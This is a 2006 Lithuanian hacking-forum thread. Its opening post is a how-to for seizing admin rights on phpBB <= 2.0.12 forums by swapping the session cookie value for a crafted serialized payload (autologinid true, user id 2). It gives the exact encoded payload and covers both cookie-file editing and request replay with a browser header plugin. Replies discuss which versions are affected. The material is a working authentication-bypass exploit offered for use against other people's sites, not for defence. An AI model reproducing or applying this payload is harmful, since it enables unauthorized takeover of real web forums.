Hacked on phpBB <= 2.0.12 by n00b37

Hakeriai dalinkitės patirtimi
Skelbti atsakymą
Žinutė
Autorius
Vartotojo avataras
Qw3rty
garbės narys
garbės narys
Pranešimai:217
Užsiregistravo:2006 04 24 21:07
Miestas:VIlnius
Susisiekti:
Hacked on phpBB <= 2.0.12 by n00b37

#1 Standartinė Qw3rty » 2006 05 30 11:52

na va dabar as jums parasisiu kaip galima perimti musu mylimus forumus ant phpBB.

Aprasisiu kaip dariti tai su firefoxu ir musu "mylimu" Internet Explorer.

Internet Explorer

Irasinejame adresa musu taikinio, mes turime ijunkti cookies, ir rejestrojames.
Turime ijungti opcia zinok slaptazoti, ar pan...

Paskuj einame i kataloga kur yra cookies C:\Documents and Settings\[$useriovardas]\Cookies
Ieskome sausainio is musu forumo buna kaskas panasaus:
Szukamy w nim ciasteczka z naszego forum, przeważnie:
[userionaimas]@[Forumonaimas],atidarome tai su notepad jis turi prasideti taip:phpbb2mysql_data[ir cia numeriukai]
Tuose "makonose" randame kaska tokio
:
a%3A0%3A%7B%7D ir tai mes pervardiname :

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22useri d%22%3Bs%3A1%3A%222%22%3B%7D

Irasome cookies, ant ie dodame funkcja reload ir mes jau adminai :)

Mozzila Firefox

Su firefox bus lengviau.

Downloadiname labai idomu plugina http://livehttpheaders.mozdev.org/
instalojam ir restartuojam ff.

jungiames su forumu, nereika rejestruotis :D,
Einame Tools => Live HTTP Headers
ir laukiame kol saitas uzsiloadins,paskuj aukiame kada mums pasirodis kaskas tuokio:

GET /phpbb2/index.php HTTP/1.1
Host : localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)
Gecko/20041107 Firefox/1.0
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,t ext/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D

Paskuj clickiname Replay ir

Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Pervardink tai

Kodas: Pasirinkti visus

a%3A0%3A%7B%7D
situo

Kodas: Pasirinkti visus

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22useri  d%22%3Bs%3A1%3A%222%22%3B%7D
Dar karta replay ir viskas mes adminai :D
zinau sis postas nera geriausias bet neks nepradeda hackoti teo (telekomo) serveriu :)
Big thx 4 securityfocus.net
Paveikslėlis
Paveikslėlis
Paveikslėlis
Learning Delphi

Vartotojo avataras
Qw3rty
garbės narys
garbės narys
Pranešimai:217
Užsiregistravo:2006 04 24 21:07
Miestas:VIlnius
Susisiekti:

#2 Standartinė Qw3rty » 2006 05 30 11:53

nezinau kodel bet man gavos 3 temos :shock: :?: :?: :? :?
Paveikslėlis
Paveikslėlis
Paveikslėlis
Learning Delphi

Xgreem
ultra dalyvis
ultra dalyvis
Pranešimai:522
Užsiregistravo:2006 02 25 20:00

#3 Standartinė Xgreem » 2006 05 30 13:47

Galejai geriau antroje hack temoje parasyti.Ten kskp seniai sujudimas kox buvo ;)
linux + nessus + nmap + exploit +enter = all doors open

Sibiras
Pranešimai:2
Užsiregistravo:2006 04 15 21:07

#4 Standartinė Sibiras » 2006 05 30 14:51

Good for noobs :? geriau butum parases koky 2.0.20 hacked o ne caro ruriko laiku foruma hacking

Vartotojo avataras
mrg
garbės narys
garbės narys
Pranešimai:229
Užsiregistravo:2006 02 07 20:14

#5 Standartinė mrg » 2006 05 30 16:18

Tut buvo visai idomus, tik bandydamas susiduriau su keliais nenumatytais atvejais, nuejus i foruma, ir paleidus tools Live Http headers, kraunasi tiek kad man nusibosta laukti, del kokiu priezasciu tai gali ivykti? Paziurejau google headerius ir aptikau idomu dalyka, kad
HTTP/1.x 200 OK
Cache-Control: private
Content-Type: text/html
Server: GWS/2.1
Date: Tue, 30 May 2006 13:15:14 GMT
X-Cache: MISS from proxy.ISP.lt
X-Cache-Lookup: MISS from proxy.ISP.lt:3128
Connection: close


GET /complete/search?hl=en HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.com/webhp?complete=1&hl=en
Cookie: PREF=ID=bf8d736975537bfc:TM=1148992462:LM=1148992462:S=VIxFFaxpB4ozC8Vv

HTTP/1.x 200 OK
Content-Type: text/html; charset=utf-8
Server: Auto-Completion Server
Cache-Control: private, x-gzip-ok=""
Date: Tue, 30 May 2006 13:15:15 GMT
X-Cache: MISS from proxy.ISP.lt
X-Cache-Lookup: MISS from proxy.ISP.lt:3128
Connection: close
Nejau mano ISP prikiso prie to nagus? Ir ka reiskia tas zodis "rejestrojames" :)

Vartotojo avataras
Qw3rty
garbės narys
garbės narys
Pranešimai:217
Užsiregistravo:2006 04 24 21:07
Miestas:VIlnius
Susisiekti:

#6 Standartinė Qw3rty » 2006 05 30 17:05

rejestruojames t.y. REJESTRUOJAMES
O kai nueini i foruma tai ijungi livehttphdrs ir duodi reload
Paveikslėlis
Paveikslėlis
Paveikslėlis
Learning Delphi

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#7 Standartinė GODhack » 2006 05 30 18:06

Taip: senas geras exploitas is senu geru laiku. Labai paprastas ir dar labiau efektyvus. Dabar tai sunkiausia dalis darant kas cia parasyta tai rast pakankamai sena phpbb versija, kad viskas suveiktu.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
DF
profesionalas
profesionalas
Pranešimai:2979
Užsiregistravo:2005 08 14 10:54

#8 Standartinė DF » 2006 07 19 21:50

Jai exploitas tinka 2.0.12 versijai ar jis tiks ankstesnems? pvz 2.0.10 ir pan.
Kai bobu nera - Buna blogai, Bet kai bobu yra - buna dar blogiau..Ishvadas daryk pats.

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#9 Standartinė GODhack » 2006 07 20 01:51

Prie exploito daznai rasoma <= 2.0.12.
<= zenklas programavimo kalbose reiskia "maziau arba lygu".
O jei tik rasoma 2.0.12 be <= tai matyt tik = arba < nieks nebande.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
DF
profesionalas
profesionalas
Pranešimai:2979
Užsiregistravo:2005 08 14 10:54

#10 Standartinė DF » 2006 07 20 12:34

A, supratau.
Kai bobu nera - Buna blogai, Bet kai bobu yra - buna dar blogiau..Ishvadas daryk pats.

Skelbti atsakymą

Grįžti į

Dabar prisijungę

Vartotojai naršantys šį forumą: 2 ir 0 svečių